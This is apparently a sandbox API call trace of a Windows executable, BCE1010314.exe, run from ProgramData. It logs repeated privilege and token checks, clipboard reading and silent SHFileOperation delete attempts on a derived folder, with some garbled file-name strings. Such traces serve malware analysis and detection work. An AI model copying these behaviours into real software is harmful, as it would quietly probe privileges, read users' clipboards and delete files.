0x0 [0085.202] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.202] GetLastError () returned 0x578 [0085.202] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.202] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.202] GetCurrentThread () returned 0xfffffffe [0085.202] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.202] GetLastError () returned 0x3f0 [0085.202] GetCurrentProcess () returned 0xffffffff [0085.202] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.202] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.202] SetLastError (dwErrCode=0x522) [0085.202] CloseHandle (hObject=0x114) returned 1 [0085.202] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.202] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.202] GetLastError () returned 0x578 [0085.202] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.202] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.202] GetCurrentThread () returned 0xfffffffe [0085.202] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.202] GetLastError () returned 0x3f0 [0085.202] GetCurrentProcess () returned 0xffffffff [0085.202] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.202] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.202] SetLastError (dwErrCode=0x522) [0085.202] CloseHandle (hObject=0x114) returned 1 [0085.202] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.202] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.202] GetLastError () returned 0x578 [0085.203] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.203] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.203] GetCurrentThread () returned 0xfffffffe [0085.203] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.203] GetLastError () returned 0x3f0 [0085.203] GetCurrentProcess () returned 0xffffffff [0085.203] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.203] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.203] SetLastError (dwErrCode=0x522) [0085.203] CloseHandle (hObject=0x114) returned 1 [0085.203] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.203] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.203] GetLastError () returned 0x578 [0085.203] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.203] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.203] GetCurrentThread () returned 0xfffffffe [0085.203] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.203] GetLastError () returned 0x3f0 [0085.203] GetCurrentProcess () returned 0xffffffff [0085.203] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.203] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.203] SetLastError (dwErrCode=0x522) [0085.203] CloseHandle (hObject=0x114) returned 1 [0085.203] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.203] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.203] GetLastError () returned 0x578 [0085.203] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.203] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.203] GetCurrentThread () returned 0xfffffffe [0085.203] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.203] GetLastError () returned 0x3f0 [0085.203] GetCurrentProcess () returned 0xffffffff [0085.203] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.203] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.203] SetLastError (dwErrCode=0x522) [0085.203] CloseHandle (hObject=0x114) returned 1 [0085.204] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.204] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.204] GetLastError () returned 0x578 [0085.204] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.204] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.305] GetCurrentThread () returned 0xfffffffe [0085.305] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.305] GetLastError () returned 0x3f0 [0085.305] GetCurrentProcess () returned 0xffffffff [0085.305] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.305] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.305] SetLastError (dwErrCode=0x522) [0085.305] CloseHandle (hObject=0x114) returned 1 [0085.305] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.305] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.305] GetLastError () returned 0x578 [0085.360] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.360] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.360] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.360] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.360] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.360] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.360] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.360] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.360] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.360] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.360] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.361] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.362] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.362] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.362] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.362] GetForegroundWindow () returned 0x1005e [0085.362] GetWindowLongA (hWnd=0x1005e, nIndex=-4) returned 0 [0085.362] SetActiveWindow (hWnd=0x1005e) returned 0x0 [0085.362] SetWindowLongA (hWnd=0x1005e, nIndex=-4, dwNewLong=0) returned 0 [0085.362] OleInitialize (pvReserved=0x0) returned 0x0 [0085.364] OleGetClipboard (in: ppDataObj=0x18f494 | out: ppDataObj=0x18f494*=0x38e328) returned 0x0 [0085.365] CoInitialize (pvReserved=0x0) returned 0x1 [0085.365] CoCreateInstance (in: rclsid=0x18fae0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), pUnkOuter=0x0, dwClsContext=0x4, riid=0x5583b740*(Data1=0x112, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18fe0c | out: ppv=0x18fe0c*=0x0) returned 0x80040154 [0086.787] StrDupA (lpSrch="buffer text") returned="buffer text" [0086.787] LocalFree (hMem=0x3a1788) returned 0x0 [0086.787] FormatMessageA (in: dwFlags=0x1000, lpSource=0x0, dwMessageId=0x80040154, dwLanguageId=0x800, lpBuffer=0x18c624, nSize=0x78, Arguments=0x0 | out: lpBuffer="Class not registered\r\n") returned 0x16 [0086.788] OutputDebugStringA (lpOutputString="Class not registered\r\n") [0086.789] GetDC (hWnd=0x0) returned 0x50100d1 [0086.790] CreateCompatibleDC (hdc=0x50100d1) returned 0x40101c3 [0086.790] GetIconInfo (in: hIcon=0x0, piconinfo=0x18eecc | out: piconinfo=0x18eecc) returned 0 [0086.790] SetFileAttributesW (lpFileName="ݯ瘀盢Őǧǔǧ\x02", dwFileAttributes=0x20) returned 0 [0086.790] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0086.790] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18a058, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1817f4*="system32") returned 0x13 [0086.790] SetFileAttributesW (lpFileName="ݯ瘀풼\x16￾￿㲣盭\x02", dwFileAttributes=0x20) returned 0 [0086.790] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0086.790] GetDC (hWnd=0x0) returned 0x20101c1 [0086.790] CreateCompatibleDC (hdc=0x20101c1) returned 0x4010263 [0086.790] GetIconInfo (in: hIcon=0x0, piconinfo=0x18efd0 | out: piconinfo=0x18efd0) returned 0 [0086.790] GetDC (hWnd=0x0) returned 0x2010264 [0086.790] CreateCompatibleDC (hdc=0x2010264) returned 0x4010275 [0086.790] GetIconInfo (in: hIcon=0x0, piconinfo=0x18eef4 | out: piconinfo=0x18eef4) returned 0 [0086.790] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0086.791] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0086.791] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e9ec, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0086.791] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0086.791] wsprintfA (in: param_1=0x18e9ec, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0086.942] SHFileOperationA (in: lpFileOp=0x18f714*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x3d0000) | out: lpFileOp=0x18f714*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x3d0000)) returned 2 [0087.291] SetFileAttributesW (lpFileName="ݯĀ↫ǧ", dwFileAttributes=0x20) returned 0 [0087.292] GetDC (hWnd=0x0) returned 0x7010274 [0087.292] CreateCompatibleDC (hdc=0x7010274) returned 0x701025a [0087.292] GetIconInfo (in: hIcon=0x0, piconinfo=0x18eea4 | out: piconinfo=0x18eea4) returned 0 [0087.292] GetDC (hWnd=0x0) returned 0xa010251 [0087.292] CreateCompatibleDC (hdc=0xa010251) returned 0x801025d [0087.292] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ee7c | out: piconinfo=0x18ee7c) returned 0 [0087.292] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.292] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18ac74, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.292] GetDC (hWnd=0x0) returned 0x501025e [0087.292] CreateCompatibleDC (hdc=0x501025e) returned 0xe010610 [0087.292] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ee54 | out: piconinfo=0x18ee54) returned 0 [0087.292] GetDC (hWnd=0x0) returned 0x7010255 [0087.292] CreateCompatibleDC (hdc=0x7010255) returned 0x7010259 [0087.293] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ee2c | out: piconinfo=0x18ee2c) returned 0 [0087.293] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.293] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e5dc, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.293] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.293] wsprintfA (in: param_1=0x18e5dc, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.293] SHFileOperationA (in: lpFileOp=0x18f514*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x450000) | out: lpFileOp=0x18f514*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x450000)) returned 2 [0087.343] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.343] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x189640, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.343] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.343] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18c3a4, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.343] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815e4 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.343] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18c1a0, lpFilePart=0x181800 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x181800*="system32") returned 0x13 [0087.343] SetFileAttributesW (lpFileName="ݯ縀", dwFileAttributes=0x20) returned 0 [0087.343] GetDC (hWnd=0x0) returned 0x4010256 [0087.343] CreateCompatibleDC (hdc=0x4010256) returned 0x701024f [0087.343] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ee40 | out: piconinfo=0x18ee40) returned 0 [0087.343] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e8e8, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.343] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.343] wsprintfA (in: param_1=0x18e8e8, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.343] SHFileOperationA (in: lpFileOp=0x18f6d4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="a") | out: lpFileOp=0x18f6d4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="a")) returned 2 [0087.345] SetFileAttributesW (lpFileName="ݯ䌀䕄䝆䥈䭊", dwFileAttributes=0x20) returned 0 [0087.345] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.345] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18bf9c, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1817f4*="system32") returned 0x13 [0087.345] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.345] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18bd98, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1817f4*="system32") returned 0x13 [0087.345] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.345] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18ddbc, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.345] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.345] wsprintfA (in: param_1=0x18ddbc, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.345] SHFileOperationA (in: lpFileOp=0x18f5d4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xa50000) | out: lpFileOp=0x18f5d4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xa50000)) returned 2 [0087.346] GetDC (hWnd=0x0) returned 0x3010250 [0087.346] CreateCompatibleDC (hdc=0x3010250) returned 0x601024d [0087.346] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ee90 | out: piconinfo=0x18ee90) returned 0 [0087.346] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.346] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18bb94, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.347] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.347] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18c4a8, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1817f4*="system32") returned 0x13 [0087.347] SetFileAttributesW (lpFileName="ݯ였Äǧ\x01", dwFileAttributes=0x20) returned 0 [0087.347] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e3d4, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.347] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.347] wsprintfA (in: param_1=0x18e3d4, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.347] SHFileOperationA (in: lpFileOp=0x18f694*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x0) | out: lpFileOp=0x18f694*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x0)) returned 2 [0087.348] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.348] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18b790, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.348] SetFileAttributesW (lpFileName="ݯ琀￿￿ﯚ盫褊痏\x02", dwFileAttributes=0x20) returned 0 [0087.348] GetDC (hWnd=0x0) returned 0x301024e [0087.348] CreateCompatibleDC (hdc=0x301024e) returned 0x601024b [0087.348] GetIconInfo (in: hIcon=0x0, piconinfo=0x18efbc | out: piconinfo=0x18efbc) returned 0 [0087.348] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18d9ac, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.348] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.348] wsprintfA (in: param_1=0x18d9ac, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.348] SHFileOperationA (in: lpFileOp=0x18f554*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x450000) | out: lpFileOp=0x18f554*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x450000)) returned 2 [0087.350] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.350] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18b58c, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.350] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.350] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18b388, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1817f4*="system32") returned 0x13 [0087.350] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e1cc, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.350] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.350] wsprintfA (in: param_1=0x18e1cc, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.350] SHFileOperationA (in: lpFileOp=0x18f654*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xc50000) | out: lpFileOp=0x18f654*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xc50000)) returned 2 [0087.352] GetDC (hWnd=0x0) returned 0x301024c [0087.352] CreateCompatibleDC (hdc=0x301024c) returned 0x6010249 [0087.352] GetIconInfo (in: hIcon=0x0, piconinfo=0x18eee0 | out: piconinfo=0x18eee0) returned 0 